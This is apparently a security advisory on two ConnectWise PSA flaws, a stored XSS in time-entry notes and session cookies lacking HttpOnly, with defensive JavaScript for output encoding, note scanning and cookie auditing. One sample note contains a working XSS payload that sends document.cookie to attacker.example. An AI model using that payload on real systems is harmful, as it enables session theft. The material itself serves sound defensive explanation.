ConnectWise Patches High-Severity XSS and Session Cookie Vulnerabilities in PSA Platform
ConnectWise has released a security update for its Professional Services Automation (PSA) platform, addressing two vulnerabilities that could allow stored script execution and session cookie theft.
The company recommends upgrading to version 2026.1 as soon as possible.
Vulnerabilities
| CVE ID | Type | CVSS Score | Impact |
|---|---|---|---|
| CVE-2026-0695 | Cross-Site Scripting (XSS) | 8.7 (High) | Stored script execution |
| CVE-2026-0696 | Sensitive Cookie Without HttpOnly | 6.5 (Medium) | Session cookie exposure |
CVE-2026-0695 - Stored XSS
A flaw in Time Entry note handling could permit stored script execution in both the PSA web client and the PSA Desktop application. Because the payload is saved with the note, it runs for every user who later views that entry in either client, with no further interaction by the attacker. Successful exploitation could lead to:
- Session hijacking
- Actions performed on behalf of authenticated users
- Access to sensitive data
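The mechanics of the stored case, as an added example that is not ConnectWise code and does not reflect how PSA renders notes: the same note record passed through an unencoded template and through an output-encoded one, plus a heuristic scan that flags stored notes carrying markup. The note records, author names and the sample payload are constructed for illustration.

```javascript
// Added example (not ConnectWise code): how a stored note becomes script
// execution when rendered unescaped, and the output-encoding fix.
// The record layout and note text below are constructed for illustration.

// Minimal HTML entity encoder for text placed in an element body or a
// double-quoted attribute value.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable rendering: the note body is concatenated straight into markup,
// so any tag in the stored note is live HTML for every viewer.
function renderNoteUnsafe(note) {
  return `<div class="note" title="${note.author}">${note.body}</div>`;
}

// Hardened rendering: each untrusted field is encoded for the context it is
// placed in (attribute value and element body both take entity encoding).
function renderNoteSafe(note) {
  return `<div class="note" title="${escapeHtml(note.author)}">${escapeHtml(note.body)}</div>`;
}

// Heuristic scan of stored notes for markup that has no business in a plain
// text time entry: tags, inline event handlers, javascript: URLs. Useful for
// triaging an export of existing entries before or after patching.
const SUSPICIOUS = [
  /<\s*\/?\s*[a-z][^>]*>/i,   // any HTML tag
  /\bon[a-z]+\s*=/i,           // onerror=, onload=, ...
  /javascript\s*:/i,           // javascript: URL scheme
];

function findSuspiciousNotes(notes) {
  return notes
    .filter((n) => SUSPICIOUS.some((re) => re.test(n.body)))
    .map((n) => n.id);
}

// Constructed sample records (hypothetical ids, authors and bodies).
// Note 103 contains a bare "<" to show the scan does not flag ordinary text.
const SAMPLE_NOTES = [
  { id: 101, author: "tech1", body: "Reset password for user, 30 min" },
  { id: 102, author: "tech2", body: `<img src=x onerror="fetch('https://attacker.example/?c='+document.cookie)">` },
  { id: 103, author: "tech3", body: "Followed up on ticket #4521 <3" },
];

console.log(renderNoteUnsafe(SAMPLE_NOTES[1]));
console.log(renderNoteSafe(SAMPLE_NOTES[1]));
console.log("suspicious note ids:", findSuspiciousNotes(SAMPLE_NOTES));
```

The scan is a triage aid, not a filter: the fix is encoding at render time in both clients, since a denylist on input is trivially bypassed.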
CVE-2026-0696 - Cookie Exposure
Separately, certain session cookies were issued without the HttpOnly flag, leaving them readable from client-side script via document.cookie. Any JavaScript running in the PSA origin, including a payload stored through CVE-2026-0695, could read and exfiltrate the session token; with HttpOnly set, the browser withholds the cookie from script even when an XSS is present.
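What the missing flag exposes, and how to check for it, as an added example that is not ConnectWise code: a small Set-Cookie parser, a function returning the cookies that page script (and therefore an XSS payload) can read, and an audit of session-looking cookies for HttpOnly, Secure and SameSite, run over a weak header set beside its corrected form. The cookie names and values are constructed; the page does not name the real PSA cookies.

```javascript
// Added example (not ConnectWise code): what a missing HttpOnly flag means in
// practice and how to audit Set-Cookie headers for it. Cookie names and values
// below are constructed; the real PSA cookie names are not documented here.

// Parse one Set-Cookie header into { name, value, attrs }, where attrs maps
// lower-cased attribute names to their (possibly empty) values.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const name = eq === -1 ? pair : pair.slice(0, eq);
  const value = eq === -1 ? "" : pair.slice(eq + 1);
  const attrs = {};
  for (const a of rest) {
    if (!a) continue;
    const i = a.indexOf("=");
    const k = (i === -1 ? a : a.slice(0, i)).toLowerCase();
    attrs[k] = i === -1 ? "" : a.slice(i + 1);
  }
  return { name, value, attrs };
}

// Names of cookies that page script can read via document.cookie: every
// cookie issued without HttpOnly. This is exactly the set an XSS payload sees.
function cookiesExposedToScript(headers) {
  return headers
    .map(parseSetCookie)
    .filter((c) => !("httponly" in c.attrs))
    .map((c) => c.name);
}

// Findings for cookies whose names look session-related: which of the three
// protective attributes are absent.
function auditSessionCookies(headers, sessionPattern = /sess|auth|token/i) {
  const findings = [];
  for (const c of headers.map(parseSetCookie)) {
    if (!sessionPattern.test(c.name)) continue;
    const missing = [];
    if (!("httponly" in c.attrs)) missing.push("HttpOnly");
    if (!("secure" in c.attrs)) missing.push("Secure");
    if (!("samesite" in c.attrs)) missing.push("SameSite");
    if (missing.length) findings.push({ name: c.name, missing });
  }
  return findings;
}

// Constructed response headers: the weak form beside the corrected one.
// "psa_session" is a hypothetical name standing in for a session cookie.
const WEAK_HEADERS = [
  "psa_session=abc123; Path=/",                                  // readable by script
  "theme=dark; Path=/",                                          // non-sensitive preference
];
const HARDENED_HEADERS = [
  "psa_session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax", // withheld from script
  "theme=dark; Path=/",
];

console.log("script-readable (weak):", cookiesExposedToScript(WEAK_HEADERS));
console.log("script-readable (hardened):", cookiesExposedToScript(HARDENED_HEADERS));
console.log("audit (weak):", JSON.stringify(auditSessionCookies(WEAK_HEADERS)));
```

To run the audit against a live instance, collect the Set-Cookie lines from a login response (for example from `curl -sI` or the browser's network panel) and pass them to auditSessionCookies; the preference cookie is left alone on purpose, since HttpOnly is only required on cookies that carry authority.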
Affected Versions
All ConnectWise PSA versions prior to 2026.1.
Remediation
- Cloud: Instances are being automatically updated
- On-premise: Apply the 2026.1 release patches and ensure all desktop clients are updated
ConnectWise has assigned the update a Priority 2 (Moderate) rating, recommending installation "as soon as possible (e.g. within days)."
Why This Matters
ConnectWise PSA is widely used by managed service providers (MSPs) and IT service companies. MSP tools are frequent targets for attackers seeking to compromise multiple downstream clients through a single breach point.